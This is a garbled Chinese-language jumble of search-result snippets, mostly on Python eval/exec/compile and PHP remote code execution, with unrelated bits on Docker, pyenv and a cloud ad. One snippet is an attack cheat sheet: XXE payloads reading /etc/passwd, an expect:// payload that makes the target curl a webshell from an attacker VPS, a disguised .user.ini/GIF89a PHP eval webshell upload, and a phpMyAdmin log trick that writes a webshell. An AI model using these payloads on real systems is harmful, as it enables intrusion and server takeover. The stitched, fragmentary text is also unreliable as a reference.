1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
01、函数原型 eval(expression[, globals[, locals]])
RCE(Remote code execution)远程代码执行漏洞,RCE又分命令执行和代码执行。
在python中有多种运行外部程序的方法,比如,运行操作系统命令或另外的python脚本,或执行一个磁盘上的文件,或通过网络来运行文件
代码注入攻击指的是任何允许攻击者在网络应用程序中注入源代码,从而得到解读和执行的方法。
1. 屏蔽所有报错信息的函数。 error_reporting(0); 2. 对文件进行语法高亮显示的函数。 highlight_file();3. 环境中重要的代码段。 if(isset(_GET['url'])) #isset函数用来检测url变量是否存在;_GET函数获取变量数据 { eval(
还记得上篇文章记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门),我们讲到了一些PHP的一些如何巧妙地绕过数字和字母受限的技巧,今天我要给大家分享的是如何在命令长度受限的情况下成功get到webshell,以及关于函数参数受限的突破,mysql的一些骚操作技巧~~~
将文件分成小于2KB大小的hex在上传,在9.6版本中切割必须等于2KB才能上传成功。先创建一个OID作为写入对象,然后通过0,1,2,3……分片上传,最后倒入/tmp目录下并删除OID,命令执行:
从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令
拿下一个站后总希望自己的后门能够很隐蔽!不让网站管理员或者其他的Hacker发现,网上关于隐藏后门的方法也很多,如加密、包含,解析漏洞、加隐藏系统属性等等,但大部分已经都不实用了,随便找一个查马的程序就能很快的查出来,下面分享我总结的一些经验:
可以看出其他用户是没有高权限的,写入执行权限都没有,就不能在当前目录下写马;经尝试,bash反弹shell未能成功。
命令执行(Remote Command Execution, RCE) Web应用的脚本代码在执行命令的时候过滤不严 从而注入一段攻击者能够控制的代码 在服务器上以Web服务的后台权限远程执行恶意指令
PHP提供如下函数用于执行外部应用程序;例如:system()、shell_exec()、exec()、passthru()
Nodejs特例 大小写转换函数 toUpperCase(): 将小写转换为大写的函数 toLowerCase(): 将大写转换为小写的函数 注意: 前者可以将ı转换为I, 将ſ转为为S 后者可以将İ转换为i, 将K转换为k 数组 a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag) 通过调试: 可以传入数组绕过。 命令执行 eval eval() 函数可计算某个字符串,并执行其中的的 JavaScr
PostgreSQL 是一个自由的对象-关系数据库服务器(数据库管理系统),本文对于postgresql的使用及利用做个总结备份。
1.3、XXE相关技巧 1.3.1、XXE载荷构技巧 使用seclists的XXE-Fuzzing.txt的第9行,做一个简单改造即可使用。对比如下: 改造前: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径:SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后,再加上回显位置即可成功利用,完整载荷示例: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种,通过上传webshell来。 利用前提:知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上,直接寄。 1)使用python托管webshell python -m http.server 8088 2)下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析: curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代,没啥好说的,常规思路。 下载url不能带协议 下载url用单引号包裹,如果是-o方式,保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传 这个跟.htaccess差不多,.user.ini是php给用户的自定义配置文件,可将指定文件按照php脚本文件的形式解析。 介绍:https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程: 1)上传.user.ini filename:.user.ini Content-type:image/jpeg 文件正文: GIF89a auto_prepend_file = aaa.jpg 2)上传webshell filename: aaa.jpg Content-type:image/jpeg 文件正文: GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析 导出数据包: 文件——导出分组解析结果——为纯文本 通过notepad++解码: 提取所有注入数据包,此处使用notepad++中的标记功能,查找模式设置为正则表达式。 提取出来以后,找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。 找到所有数据后,用英文的逗号隔开,然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马 前提:知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目
docker是啥就不多讲了,简言之就是更轻量、更牛叉的新一代虚拟机技术。下面是安装步骤: 一、mac/windows平台的安装 docker是在linux内核基础上发展而来的,无法直接运行在mac/windows上,需要借助docker-machine工具,先在mac/windows上建一个linux的虚拟机,然后才能继续玩下去。默认内置的虚拟机引擎是Oracle的免费软件VirtualBox,可支持vmware fusion之类的商业软件。 1.1 下载docker toolbox 下载地址:http:/
注意, 跑到的结果不一定准确, 可以使用_name\_参数确定模块(类)的名字, 结合直接访问链接到原文确认可行性后进入python控制台导入相关模板后检查看看是不是确实有索要查找的函数方法
compile()函数允许程序员在运行时刻迅速生成代码对象,然后就可以用exec 语句或者内建函数eval()来执行这些对象或者对它们进行求值。一个很重要的观点是:exec 和eval()都可以执行字符串格式的Python 代码。当执行字符串形式的代码时,每次都必须对这些代码进行字节编译处理。compile()函数提供了一次性字节代码预编译,以后每次调用的时候,都不用编译了。
compile 函数返回结果 1、如果编译通过,结果可以生成字节码(类型code)或者AST(抽像语法树),字节码可以使用函数exec()或eval来执行,而AST可以使用eval()来继续编译(关于AST的内容本节都不介绍,ATS 对象:Abstract Syntax Tree,抽象语法树,是源代码语法结构的一种抽象表示。关于抽象语法树大家可以参考:https://zhuanlan.zhihu.com/p/26988179; 2、exec 语句:exec 执行储存在字符串或文件中的Python语句,相比于 eval,exec可以执行更复杂的 Python 代码。需要说明的是在 Python2 中exec不是函数,而是一个内置语句; 3、如果编译的源码不合法,此函数会触发 SyntaxError 异常;如果源码包含 空字节(空字符串),则3.5版本以前会触发 ValueError 异常,3.5版本后则不会触发可以编译通过并执行。注意: 1) 在 ‘single’ 或 ‘eval’ 模式编译多行代码字符串(这些串必须是一个完整语句或表达式而不是多个语句或表达式)时,输入必须以至少一个换行符结尾; 2)如果编译足够大或者足够复杂的字符串成 AST 对象时,Python 解释器会因为 Python AST 编译器的栈深度限制而崩溃
目前的现状,开发者在提交代码后还需要去构建镜像,上传镜像到镜像仓库,频繁的修改就需要频繁的构建。
计算指定表达式的值。也就是说它要执行的python代码只能是单个表达式(注意eval不支持任何形式的赋值操作),而不能是复杂的代码逻辑。
exec语句将字符串str当成有效Python代码来执行.提供给exec的代码的名称空间和exec语句的名称空间相同.exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句
Python 支持通过 eval 函数执行字符串命令,本文记录相关内容。 eval eval() 函数用来执行一个字符串表达式,并返回表达式的值。 语法 以下是 eval() 方法的语法: eval(expression[, globals[, locals]]) 参数 expression – 表达式。 globals – 变量作用域,全局命名空间,如果被提供,则必须是一个字典对象。 locals – 变量作用域,局部命名空间,如果被提供,可以是任何映射对象。 示例 a="[1,2,3,4,5]"
RCE(remote command/code execute)RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
刚好前些天有人提到eval()与exec()这两个函数,所以就翻了下Python的文档。这里就来简单说一下这两个函数以及与它们相关的几个函数,如globals()、locals()和compile():
计算指定表达式的值。也就是说它要执行的Python代码只能是单个运算表达式(注意eval不支持任意形式的赋值操作),而不能是复杂的代码逻辑,这一点和lambda表达式比较相似。
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。
命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一
开发项目中在编写代码时没有做严格的安全控制,导致攻击者通过接口或相关参数提交有危害的命令,从而让后台进行执行,从而控制整个后台服务器
Python 提供了很多内置的工具函数(Built-in Functions),在最新的 Python 3 官方文档中,它列出了 69 个。
3.eval("8*6") eval("")里面只能执行表达式,执行eval()会有返回值,exec执行完无返回值.
>>> exec("print('姓名:'+name+'性别:'+sex)",person)
最近刚刚学到两个新的命令exec和eval,这两个命令可以在代码中动态执行python脚本。
funcname = "func" func = "def %s():\n" % funcname funccontent = 'print "hello,world"' func += funccontent evalcode = compile(func, '', 'eval') exec (evalcode) eval("%s" % funcname) 执行后编译错误: eval_code = compile(func, '', 'eval') File "", line 1 def fu
eval 和 exec 都是python的内置函数,并且都能执行python代码,两者具体有什么区别呢?
[极客大挑战 2019]RCE ME:https://buuoj.cn/challenges#[极客大挑战 2019]RCE ME
argument_list是参数列表,它的结构与Python中函数(function)的参数列表是一样的。
实参是一个字符串,以及可选的 globals 和 locals。globals 实参必须是一个字典。locals 可以是任何映射对象。
不知不觉 JDK13 发布已有两个月,不知道各位有没有下载学习体验一番?每次下载安装之后,需要重新配置一下 Java 环境变量。等到运行平时的项目又需要切回之前 JDK 版本,这又需要重新环境变量。这么重复配置显然非常低效,又不能灵活切换版本。
pyenv可以帮助你在一台开发机上建立多个版本的python环境, 并提供方便的切换方法。
1.数字计算 declare -i num=10 while [ $num -ne 0] do num=num-1 done
反射机制就是在运行时,动态的确定对象的类型,并可以通过字符串调用对象属性、方法、导入模块,是一种基于字符串的事件驱动。
lsof -i:[port] netstat -anp |grep [port]
eval和exec都是python内置的可以执行python代码的函数,但它们之间有所区别。
在Python中,定义一个函数要使用def语句,依次写出函数名、括号、括号中的参数和冒号:,然后,在缩进块中编写函数体,函数的返回值用return语句返回。
Help on built-in function compile in module __builtin__:
领取专属 10元无门槛券
手把手带您无忧上云